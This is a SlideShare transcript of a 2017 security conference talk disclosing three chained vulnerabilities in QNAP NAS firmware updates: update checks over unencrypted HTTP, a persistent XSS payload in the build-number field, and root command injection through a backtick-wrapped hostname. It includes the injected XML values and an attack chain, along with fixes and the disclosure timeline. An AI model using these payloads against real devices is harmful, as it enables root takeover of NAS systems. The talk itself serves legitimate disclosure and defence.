Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
0-DAY SHOWDOWN
3 vulns – 1 root RCE
Harry Sintonen
ABOUT
§ Me: Consultant @ F-Secure Cyber Security Services
§ Get to do stuff such as this for living, yay!
§ Talk: Combining...
TARGET
§ OS: QNAP QTS 4.2.x “operating system” (Linux, various
platforms, including ARM and AMD64)
§ Device: QNAP TVS-663
...
VULN#1–FWUPDATEMITM
§ CWE-311: Missing Transport Layer Security in
Firmware Update Check
§ When administrator logs in the ...
VULN#1–FWUPDATEMITM
asus:~# urlsnarf -i eth0
…
asus - - [25/Aug/2016:14:49:30 +0300] "GET
http://update.qnap.com/FirmwareR...
EFFECT#1–FWUPDATE
MITM
§ Attacker in man in the middle position can intercept and
modify the firmware update check results
...
VULN#2–FWUPDATEXSS
§ CWE-79: Persistent XSS in Firmware Update Dialog
§ When new update is found, the build number of the
...
VULN#2–FWUPDATEXSS
§ Original FirmwareUpdate.xml:
<buildNumber>20160823</buildNumber>
§ Evil FirmwareUpdate.xml:
<buildNum...
VULN#2–FWUPDATEXSS
9
EFFECT#2–FWUPDATEXSS
§ Attacker can perform actions as the user in the NAS web
user interface
NOTE: The user is logged in ...
VULN#3–FWUPDATECMD
INJECTION
§ CWE-94: Command Injection in Firmware Update
§ When performing a firmware update, the firmwar...
SOHOWTOFINDRCE
VULNS?
§ Doesn’t necessarily require binary reversing
§ Here the tools were:
§ tcpdump
§ find
§ strings
§ gr...
SOHOWTOFINDRCE
VULNS?
§ First pointed the firmware update servers to my host and
fired up tcpdump to see traffic towards the h...
VULN#3–FWUPDATECMD
INJECTION
[/] # find /home/httpd -type f | xargs grep -l
FirmwareRelease.xml
/home/httpd/cgi-bin/sys/sys...
VULN#3–FWUPDATECMD
INJECTION
[/] # strings /sbin/check_new_firmware | grep ping
/bin/ping -c 2 -w 60 %s > /tmp/ping_reply ;...
VULN#3–FWUPDATECMD
INJECTION
§ Can inject arbitrary content to the command via the host
name by using the usual tricks: `e...
VULN#3–FWUPDATECMD
INJECTION
§  Original FirmwareRelease.xml:
<docRoot>
<storage>
<downloadServer>
<server>http://download...
VULN#3–FWUPDATECMD
INJECTION
§ Evil FirmwareRelease.xml:
<docRoot>
<storage>
<downloadServer>
<server>`touch pwned`</serve...
EFFECT#3–FWUPDATE
CMDINJECTION
§ The attacker can execute arbitrary commands as root
§  access to all content on the devic...
PUT IT ALL
TOGETHER
20
EVIL^WCUNNINGPLAN
1.  Man in the Middle the FirmwareUpdate.xml
2.  Inject arbitrary command to execute in <server> XML
ele...
PRACTICALATTACK
SCENARIO
1. Man in the Middle the victim’s connection
2. Send a fake security bulletin
3. Admin logs on
4....
(LIVE)DEMO
23
FIXING
§ CMD Injection: Validate host name (^[a-zA-Z0-9.-]+$)
§ XSS: HTML encode output (+ validate input)
§ Missing Trans...
WHYWASN’TITFOUND
BEFORE?
§ Vulns are usually is tested from user input arriving from
browser or other user input
§ It is n...
VULNCOORD
§ Reported to QNAP in Feb 1st 2016
§ After 180 days QNAP requested 90 more days:
“We are still working on the fix...
THANKYOU
Email: sintonen@iki.fi
More stuff: https://sintonen.fi/advisories/
27
f-secure.com
Upcoming SlideShare
Loading in …5
×

Disobey2017 0day-showdown

2,107 views

Published on

0-DAY SHOWDOWN
3 vulns - 1 root RCE

  • Be the first to comment

  • Be the first to like this

Disobey2017 0day-showdown

  1. 1. 0-DAY SHOWDOWN 3 vulns – 1 root RCE Harry Sintonen
  2. 2. ABOUT § Me: Consultant @ F-Secure Cyber Security Services § Get to do stuff such as this for living, yay! § Talk: Combining individual vulns for greater pro^Weffect § Alone the vulns aren’t necessary easily exploitable 2
  3. 3. TARGET § OS: QNAP QTS 4.2.x “operating system” (Linux, various platforms, including ARM and AMD64) § Device: QNAP TVS-663 § Access: Web UI, SSH, nfs, smb etc. 3
  4. 4. VULN#1–FWUPDATEMITM § CWE-311: Missing Transport Layer Security in Firmware Update Check § When administrator logs in the web interface the device performs firmware update check § The check is performed over HTTP § There is no transport layer security or integrity checks 4
  5. 5. VULN#1–FWUPDATEMITM asus:~# urlsnarf -i eth0 … asus - - [25/Aug/2016:14:49:30 +0300] "GET http://update.qnap.com/FirmwareRelease.xml HTTP/1.1" - - "-" "curl/7.43.0" 5
  6. 6. EFFECT#1–FWUPDATE MITM § Attacker in man in the middle position can intercept and modify the firmware update check results § Can lie about the supposedly available firmware versions, download locations, etc 6
  7. 7. VULN#2–FWUPDATEXSS § CWE-79: Persistent XSS in Firmware Update Dialog § When new update is found, the build number of the firmware is displayed to the user § The build number is embedded to the web interface HTML without encoding => Cross-Site Scripting vulnerability 7
  8. 8. VULN#2–FWUPDATEXSS § Original FirmwareUpdate.xml: <buildNumber>20160823</buildNumber> § Evil FirmwareUpdate.xml: <buildNumber>&lt;img src=x onError="alert('hacked by h4x0r!')”&gt;&lt;/img&gt;</buildNumber> 8
  9. 9. VULN#2–FWUPDATEXSS 9
  10. 10. EFFECT#2–FWUPDATEXSS § Attacker can perform actions as the user in the NAS web user interface NOTE: The user is logged in as administrator –> full admin access! 10
  11. 11. VULN#3–FWUPDATECMD INJECTION § CWE-94: Command Injection in Firmware Update § When performing a firmware update, the firmware update tool performs online check to see if the server is up § The hostname is included in a command executed by shell => Command Injection 11
  12. 12. SOHOWTOFINDRCE VULNS? § Doesn’t necessarily require binary reversing § Here the tools were: § tcpdump § find § strings § grep 12
  13. 13. SOHOWTOFINDRCE VULNS? § First pointed the firmware update servers to my host and fired up tcpdump to see traffic towards the host § Could see ICMP ECHO (ping) towards the host! § Guessed that the firmware update tool likely uses this for “online” check § Maybe the hostname is included in the ping command insecurely? 13
  14. 14. VULN#3–FWUPDATECMD INJECTION [/] # find /home/httpd -type f | xargs grep -l FirmwareRelease.xml /home/httpd/cgi-bin/sys/sysRequest.cgi [/] # strings /home/httpd/cgi-bin/sys/sysRequest.cgi | grep -A1 FirmwareRelease.xml http://update.qnap.com/FirmwareRelease.xml /sbin/check_new_firmware "%s" 1>%s 2>&1 14
  15. 15. VULN#3–FWUPDATECMD INJECTION [/] # strings /sbin/check_new_firmware | grep ping /bin/ping -c 2 -w 60 %s > /tmp/ping_reply ; /bin/cat /tmp/ ping_reply | /bin/grep time | /bin/cut -d '=' -f 4 | /bin/cut - d ' ' -f 1 ; /bin/rm -f /tmp/ping_reply 15
  16. 16. VULN#3–FWUPDATECMD INJECTION § Can inject arbitrary content to the command via the host name by using the usual tricks: `echo foo` or $(echo bar) etc. § The limitation is that the string is cut at first / (forward slash), but this is easy enough to workaround with for example: `echo -e "x2f"` 16
  17. 17. VULN#3–FWUPDATECMD INJECTION §  Original FirmwareRelease.xml: <docRoot> <storage> <downloadServer> <server>http://download.qnap.com/</server> <server>http://eu1.qnap.com/</server> <server>http://us1.qnap.com/</server> </downloadServer> … 17
  18. 18. VULN#3–FWUPDATECMD INJECTION § Evil FirmwareRelease.xml: <docRoot> <storage> <downloadServer> <server>`touch pwned`</server> </downloadServer> … 18
  19. 19. EFFECT#3–FWUPDATE CMDINJECTION § The attacker can execute arbitrary commands as root §  access to all content on the device and more… 19
  20. 20. PUT IT ALL TOGETHER 20
  21. 21. EVIL^WCUNNINGPLAN 1.  Man in the Middle the FirmwareUpdate.xml 2.  Inject arbitrary command to execute in <server> XML element 3.  Inject persistent XSS in <BuildNumber> XML element that automatically performs the firmware update, triggering the <server> command injection 4.  Inject <version> XML element that is always newer than the current firmware version, forcing the web interface to pop up the firmware update request 21
  22. 22. PRACTICALATTACK SCENARIO 1. Man in the Middle the victim’s connection 2. Send a fake security bulletin 3. Admin logs on 4. ... 5. Profit! 22
  23. 23. (LIVE)DEMO 23
  24. 24. FIXING § CMD Injection: Validate host name (^[a-zA-Z0-9.-]+$) § XSS: HTML encode output (+ validate input) § Missing Transport Layer Security: Add HTTPS certs everywhere, validate certificate chain & host name § Fixing one of the vulns would prevent automated exploitation! 24
  25. 25. WHYWASN’TITFOUND BEFORE? § Vulns are usually is tested from user input arriving from browser or other user input § It is not as interesting to pwn single devices as big website with 100 million users § Maybe it has been, who knows! 25
  26. 26. VULNCOORD § Reported to QNAP in Feb 1st 2016 § After 180 days QNAP requested 90 more days: “We are still working on the fix for this issue, could you postpone the disclosure until 90 days later?” § Agreed to postpone. No fix materialized after 90 days § It has now been 1 year after initial report, no fix 26
  27. 27. THANKYOU Email: sintonen@iki.fi More stuff: https://sintonen.fi/advisories/ 27
  28. 28. f-secure.com

×